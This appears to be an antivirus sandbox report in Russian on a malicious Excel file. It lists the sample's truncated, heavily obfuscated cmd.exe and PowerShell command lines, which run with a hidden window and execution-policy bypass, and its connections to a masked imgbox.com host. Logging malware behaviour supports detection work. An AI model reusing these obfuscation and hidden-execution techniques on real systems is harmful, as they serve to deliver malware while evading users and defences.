Техническая информация
- '<SYSTEM32>\cmd.exe' /c "ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^^^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-Ob'...
- <Текущая директория>\f6031000
- <PATH_SAMPLE>.xls
- 'im####2.imgbox.com':443
- 'im####2.imgbox.com':443
- DNS ASK im####2.imgbox.com
- '<SYSTEM32>\cmd.exe' /c "ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^^^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-Ob'...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-O...
- '<SYSTEM32>\clip.exe'
- '<SYSTEM32>\cmd.exe' /cpOWeRSHeLl -NOl -nOnInT -wiNdoWST HIDdeN -exeCUTIoNpOLi bypasS -nOpr -STa [Void][System.Reflection.Assembly]::( \"{2}{1}{4}{0}{5}{3}\" -f'alN',( \"{1}{0}\" -f'thP','oadWi' ),'L','e',( \"...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOl -nOnInT -wiNdoWST HIDdeN -exeCUTIoNpOLi bypasS -nOpr -STa [Void][System.Reflection.Assembly]::( \"{2}{1}{4}{0}{5}{3}\" -f'alN',( \"{1}{0}\" -f'thP','oadWi' ),'L','e',( \"{0}{1}\"-f'ar...